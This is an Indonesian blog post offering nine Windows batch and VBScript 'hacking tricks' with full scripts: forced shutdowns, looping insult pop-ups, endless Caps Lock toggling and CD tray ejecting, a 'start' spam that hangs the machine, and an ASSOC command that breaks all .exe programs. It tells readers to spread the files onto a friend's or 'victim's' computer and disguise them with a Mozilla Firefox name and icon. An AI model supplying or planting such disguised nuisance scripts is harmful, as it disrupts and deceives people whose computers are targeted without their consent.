Kumpulan Trik Hacking Komputer Sederhana Mematikan - RaBiitch Official

Kumpulan Trik Hacking Komputer Sederhana Mematikan

Hasil gambar untuk trik hacking sederhana

ANONIMCYBER | Hallo sob seperti judul posting ini kita Langsung saja sob, Sambil ngopi ngopi kek hehe santai sadja.

1. Membuat Forced Shoutdown


Script:
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

simpan kode script yang berwarna Merah di Notepad dengan nama : hacking.BAT type file : All file
 sebarkan File tersebut di Komputer teman Anda,
 maka Komputer korban akan otomatis FORCED SHOUTDOWN 

2. Membuat Tombol Caps Lock menyala terus-menerus


Script:
Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop 

seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : hacking.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)

3. Membuat Pesan Jail mucul terus


Script: 
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih, 
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

simpan kode script yang berwarna hijau dengan nama hacking.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
NB: Kamu bisa mengganti tulisan yang setelah tanda * itu dengan sesuka kamu

4.Membuat Komputer Hang dengan Kode script Notepad


Script:

start
start
start
start
start
start
start
start
start
start
start
start

simpan di Notepad dengan nama : hacking.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )

5.   Cara Merusak Komputer teman(Hacking Jail)


Caranya:

buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini

ASSOC.exe=.hank

lalu enter!!!

Maka program Seperti Ms.word/game-game akan ngambek untuk di jalan kan!

Setelah Puas !
Cara Mengembalikan seperti semula:
buka CMD lagi. lalu ketik 

 ASSOC.exe=EXEFILE

6.Membuat Tombol Caps Lock menyala terus-menerus


Script:
 Set wshShell =wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "{CAPSLOCK}"
 loop
 Simpan script pada Notepad dengan nama : hacking.VBS type File : All File

7.Jail dengan Membuka Tutup CD/DVD room


Script: 
Set oWMP = CreateObject("WMPlayer.OCX.7")
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count - 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
 loop

Simpan script NOTEPAD tadi dengan nama : hacking.vbs type file : All

8.Cara Membuat Pesan ' Komputer Anda Butut Sekali'


Script :
Set wshShell = wscript.CreateObject("WScript.Shell")
 do
 wscript.sleep 100
 wshshell.sendkeys "Komputer Anda Butut Sekali"
 loop

simpan script dengan nama : hacking.vbs Ttpe file:All files

9.Hacking paling jahat dan membuat jangtung DEBUAR-DEBUAR


Script: 
@echo off
msg * Perkenal kan, saya adalah trojan virus!!!!! Setelah 1 menit Komputer anda akan error dan harus di re-instal !!!! TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR Computer is being #ERROR GOD BYE ………..”

simpan script dengan nama(terserah anda) .
contoh:
 Nama: Mozila.bat
Type file : All files
 Setelah itu, ganti icon nya sesuai dengan icon mozila firefox untuk mengelabui si korban 

Selamat mencoba.

source: http://ganiazmedia.blogspot.co.id/

Belum ada Komentar untuk "Kumpulan Trik Hacking Komputer Sederhana Mematikan"

Posting Komentar

ADS atas Artikel

ADS Tengah Artikel 1

ADS Tengah Artikel 2

ADS Bawah Artikel